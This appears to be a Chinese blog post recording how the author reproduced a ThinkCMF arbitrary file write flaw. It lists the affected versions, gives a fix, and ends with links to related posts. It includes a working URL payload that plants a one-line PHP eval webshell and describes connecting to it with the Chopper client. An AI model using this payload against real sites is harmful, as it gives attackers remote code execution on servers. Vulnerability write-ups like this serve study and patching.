ThinkCMF任意文件写入漏洞----学习记录
ThinkCMF框架任意文件写入漏洞
一、ThinkCMF介绍:
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本
。
普通的CMS(内容管理系统)一般不能完成所有的需求,而因为CMS在ThinkCMF内部只是以一个应用的形式存在,所以使用ThinkCMF你可以用CMS来管理你的内容,用电影网站系统来管理视频,用电商系统来管理电商网站。这些程序不会影响,你可以模块化的增加或减少应用。
ThinkCMF自身层次非常清晰,逻辑也相当的严谨,特别是系统自带的portal应用非常适合PHP初学者使用。采用了国内优秀的开源php框架ThinkPHP使得ThinkCMF具备了优秀的性能以及良好的安全性。
二、影响版本
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3
三、漏洞原理
ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。
四、漏洞复现
访问目标网址
写入一句话木马文件 ,测试payload:?a=fetch&templateFile=public/index&prefix=%27%27&content=file_put_contents(%27in.php%27,%27<?php%20@eval($_POST[1]);%20?>%27)
回车后,显示空白页面
成功上传文件,利用菜刀连接刚才一句话木马
连接成功
五、漏洞修复建议
将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected
ThinkCMF任意文件写入漏洞----学习记录相关推荐
- 【安全狐】CVE-2016-3088_ActiveMQ任意文件写入漏洞
CVE-2016-3088_ActiveMQ任意文件写入漏洞 0x01漏洞背景 ActiveMQ的web控制台分三个应用,admin.api和fileserver,其中admin是管理员页面,api是 ...
- 修复路径穿越、任意文件写入漏洞
修复路径穿越.任意文件写入漏洞 背景 前段时间随手写的一个文件上传服务,在公司的渗透测试下漏洞百出,其中少不了路径穿越和任意文件写入漏洞.其实这两个漏洞的修复并不复杂,只要对入参进行两个条件的校验就可 ...
- 08 - vulhub - Aria2 任意文件写入漏洞
文章目录 漏洞名称:Aria2 任意文件写入漏洞 漏洞原理 漏洞复现 漏洞利用限制 环境准备 漏洞利用 验证漏洞利用是否成功并反弹 修复建议 漏洞名称:Aria2 任意文件写入漏洞 简介: Aria2 ...
- Aria2任意文件写入漏洞 漏洞复现
Aria2任意文件写入漏洞 by ADummy 0x00利用路线 第三方UI与目标进行通信->搭建http服务器->让目标下载恶意文件->定时任务执行->反弹shell 0 ...
- mysql任意文件读取漏洞学习
前言 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data ...
- 锐捷某系统前台任意文件写入漏洞分析
0x00前言 这套系统我估计是全网第一个公开能拿shell的吧(不是的话当我没说),哪套系统自己猜,这次先分享下前台任意文件写入,还有几个rce日后分享,也感谢独立团孙德胜Alan提供的思路. 0x0 ...
- 致远a8-v5-6.0协同管理软件_高危漏洞利用预警:近期利用“致远OA任意文件写入漏洞”的攻击较多...
概述腾讯御界高级威胁检测系统近期监测到"致远OA系统上的GetShell漏洞"在网上被频繁利用攻击政企客户. 对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传websh ...
- CVE-2017-12615 tomcat任意文件写入漏洞复现
目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.Windows使用burp suite抓包 三.修复方案 一.环境搭建 1.下载vulhub kali系统命令行中输入 git ...
- 致远a8 java_致远A8任意文件写入漏洞_getshell_exp
1 #coding=utf-8 2 importsys3 importrequests4 5 defencode(origin_bytes):6 """ 7 重构 bas ...
最新文章
- 初学编程的小白 | 每日趣闻
- Ubuntu下搜狗输入法乱码(二)
- 老码农冒死揭开行业黑幕:如何编写无法维护的代码
- 文本纠错pycorrector
- Magento教程 13:在Magento中设定联络表单的收件信箱
- 【C++基础学习】C++中union结构
- 北大新成果!首次成功地将CNN解码器用于代码生成 | 论文+代码
- 检测工控设备SNMP漏洞工具:SNMP Fuzzer
- 电信无线路由器服务器网站,电信拨号上网连无线路由器的方法
- 资源分享 | 敬伟 PS 教程 ABCD 四套全集
- COJ 0358 xjr考考你数据结构(根号3)线段树区间修改
- 多重集合的排列与组合
- 自我鉴定200字大专生计算机专业,大专毕业生自我鉴定200字
- GTK开发(二)控件和布局
- 外汇期货市场的组织结构
- 【FPGA学习笔记】VHDL语言(五)语言风格描述:行为描述,数据流描述,结构化描述
- 短信跳转到微信关注公众号的方案
- 逆向工程(MyBatis)
- 是女人,请进来学学拍照姿势!
- 我们什么时候需要函数隐藏